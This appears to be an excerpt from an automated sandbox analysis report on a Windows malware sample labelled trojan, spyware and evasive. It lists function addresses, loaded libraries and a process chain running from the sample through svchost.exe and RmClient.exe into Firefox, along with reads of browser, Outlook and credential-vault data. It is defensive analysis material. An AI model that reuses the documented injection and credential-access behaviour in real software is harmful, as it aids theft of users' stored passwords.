                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038FFF09
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03849EB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0385FDC0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03843D40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F1D5A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F7D73
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038FFCF2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B9C32
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D502C0
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D70274
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CDE3F0
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D903E6
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D8A352
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D62000
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D881CC
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D901AA
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D841A2
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D58158
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CC0100
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D6A118
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CEC6E0
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CCC7C0
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CF4750
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CD0770
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D7E4F6
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D82446
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D74420
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D90591
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CD0535
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CCEA80
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D86BD7
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D8AB40
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CFE8F0
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CB68B8
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CD2840
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CDA840
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CD29A0
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D9A9A6
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CE6962
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D8EEDB
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D8CE93
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CE2E90
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CD0E59
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D8EE26
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CC2FC8
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CDCFE0
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D4EFA0
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D44F40
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D72F30
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D12F28
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CF0F30
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CC0CF2
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D70CB5
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CD0C00
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CCADE0
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CE8DBF
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D6CD1F
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CDAD00
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CEB2C0
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D712ED
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CD52A0
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D1739A
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CBD34C
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D8132D
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CD70C0
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D7F0CC
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D870E9
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D8F0E0
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CDB1B0
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D9B16B
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CBF172
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D0516C
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D816CC
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D15630
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D8F7B0
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CC1460
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D8F43F
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D995C3
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D6D5B0
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D87571
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D7DAC6
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D15AA0
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D71AA3
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D6DAAC
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D8FA49
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D87A46
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D43A6C
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D45BF0
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D0DBF9
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CEFB80
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D8FB76
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CD38E06_2_02CD38E0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D3D8006_2_02D3D800
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CD99506_2_02CD9950
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CEB9506_2_02CEB950
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D659106_2_02D65910
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CD9EB06_2_02CD9EB0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CD1F926_2_02CD1F92
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D8FFB16_2_02D8FFB1
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D8FF096_2_02D8FF09
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D8FCF26_2_02D8FCF2
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D49C326_2_02D49C32
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CEFDC06_2_02CEFDC0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D81D5A6_2_02D81D5A
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CD3D406_2_02CD3D40
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D87D736_2_02D87D73
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001C18806_2_001C1880
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001BC7A06_2_001BC7A0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001BA9D06_2_001BA9D0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001BC9C06_2_001BC9C0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001BA9C66_2_001BA9C6
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001BAB196_2_001BAB19
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001BAB206_2_001BAB20
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001BABEA6_2_001BABEA
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001C4F106_2_001C4F10
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001C311C6_2_001C311C
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001C31206_2_001C3120
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001B11B46_2_001B11B4
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001DB4A06_2_001DB4A0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02A453A16_2_02A453A1
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02A3E3876_2_02A3E387
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02A4538D6_2_02A4538D
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02A3D7E86_2_02A3D7E8
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02A3E71D6_2_02A3E71D
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02A3CA886_2_02A3CA88
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03887E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0382B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 038AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 038BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03875130 appears 58 times
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: String function: 004E0AE3 appears 48 times
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: String function: 004C7DE1 appears 36 times
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: String function: 004E8900 appears 42 times
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: String function: 02D3EA12 appears 86 times
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: String function: 02D05130 appears 58 times
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: String function: 02D17E54 appears 111 times
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: String function: 02D4F290 appears 105 times
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: String function: 02CBB970 appears 280 times
                Source: 9MZZG92yMO.exe, 00000000.00000003.2173878169.0000000003BAD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 9MZZG92yMO.exe
                Source: 9MZZG92yMO.exe, 00000000.00000003.2175066463.0000000003A03000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 9MZZG92yMO.exe
                Source: 9MZZG92yMO.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@15/9
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_0052A06A GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_005181CB AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_005187E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_0052B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_0053EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_0052C397 CoInitialize,CoCreateInstance,CoUninitialize
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004C4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | File created: C:\Users\user\AppData\Local\Temp\aut28E3.tmp
                Source: 9MZZG92yMO.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: RmClient.exe, 00000006.00000003.2794979174.0000000002826000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2793286140.00000000027F3000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4010464904.0000000002826000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2794979174.00000000027F3000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4010464904.00000000027F3000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2793206258.0000000002805000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 9MZZG92yMO.exe | Virustotal: Detection: 54%
                Source: 9MZZG92yMO.exe | ReversingLabs: Detection: 65%
                Source: unknown | Process created: C:\Users\user\Desktop\9MZZG92yMO.exe "C:\Users\user\Desktop\9MZZG92yMO.exe"
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\9MZZG92yMO.exe"
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe | Process created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"
                Source: C:\Windows\SysWOW64\RmClient.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe | Section loaded: rasadhlp.dll
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe | Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\RmClient.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\RmClient.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: 9MZZG92yMO.exe | Static file information: File size 1210880 > 1048576
                Source: 9MZZG92yMO.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 9MZZG92yMO.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 9MZZG92yMO.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 9MZZG92yMO.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 9MZZG92yMO.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 9MZZG92yMO.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 9MZZG92yMO.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: RmClient.pdbGCTL | source: svchost.exe, 00000002.00000002.2453504721.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2453522622.0000000003212000.00000004.00000020.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000005.00000002.4010832786.0000000000768000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: XBOIFKGKIWT.exe, 00000005.00000002.4011137897.0000000000EFE000.00000002.00000001.01000000.00000005.sdmp, XBOIFKGKIWT.exe, 00000008.00000000.2522823189.0000000000EFE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP | source: 9MZZG92yMO.exe, 00000000.00000003.2175316459.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 9MZZG92yMO.exe, 00000000.00000003.2173408119.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358220983.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2454227225.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2454227225.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356378337.0000000003400000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4011500190.0000000002E2E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2452824167.0000000002936000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2457466949.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4011500190.0000000002C90000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb | source: 9MZZG92yMO.exe, 00000000.00000003.2175316459.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 9MZZG92yMO.exe, 00000000.00000003.2173408119.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2358220983.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2454227225.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2454227225.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356378337.0000000003400000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, RmClient.exe, 00000006.00000002.4011500190.0000000002E2E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2452824167.0000000002936000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2457466949.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4011500190.0000000002C90000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb | source: RmClient.exe, 00000006.00000002.4012231174.00000000032BC000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4010464904.000000000276D000.00000004.00000020.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000000.2523020110.00000000027FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2902094064.000000003A76C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP | source: RmClient.exe, 00000006.00000002.4012231174.00000000032BC000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4010464904.000000000276D000.00000004.00000020.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000000.2523020110.00000000027FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2902094064.000000003A76C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: RmClient.pdb | source: svchost.exe, 00000002.00000002.2453504721.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2453522622.0000000003212000.00000004.00000020.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000005.00000002.4010832786.0000000000768000.00000004.00000020.00020000.00000000.sdmp
                Source: 9MZZG92yMO.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 9MZZG92yMO.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 9MZZG92yMO.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 9MZZG92yMO.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 9MZZG92yMO.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004C4B37 LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004CC4C6 push A3004CBAh; retn 004Ch 0_2_004CC50D
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004E8945 push ecx; ret 0_2_004E8958
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004020A2 push esp; iretd 2_2_004020A3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040A9ED push esi; iretd 2_2_0040A9EE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004031B0 push eax; ret 2_2_004031B2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041EB30 push ebx; retf 2_2_0041EB5F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416BEE push ebp; ret 2_2_00416BF1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417D70 push esi; ret 2_2_00417D71
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004135D8 pushad ; retf 2_2_00413646
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413697 pushad ; retf 2_2_00413646
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004136A8 pushad ; retf 2_2_00413646
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0380225F pushad ; ret 2_2_038027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038027FA pushad ; ret 2_2_038027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038309AD push ecx; mov dword ptr [esp], ecx 2_2_038309B6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0380283D push eax; iretd 2_2_03802858
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03801368 push eax; iretd 2_2_03801369
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02CC09AD push ecx; mov dword ptr [esp], ecx 6_2_02CC09B6
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_001C2003 push ebx; ret 6_2_001C2048
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_001D020F push eax; iretd 6_2_001D021C
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_001C0425 pushad ; retf 6_2_001C0493
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_001C04F5 pushad ; retf 6_2_001C0493
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_001C04E4 pushad ; retf 6_2_001C0493
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_001C4BBD push esi; ret 6_2_001C4BBE
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_001BD070 push esi; ret 6_2_001BD07B
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_001B783A push esi; iretd 6_2_001B783B
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_001CB97D push ebx; retf 6_2_001CB9AC
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_001C3A3B push ebp; ret 6_2_001C3A3E
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_001D3C10 push edx; retf 6_2_001D3B6B
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_001CBC34 push ds; ret 6_2_001CBC36
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_001CFF68 push FFFFFFD3h; retf 6_2_001CFF6A
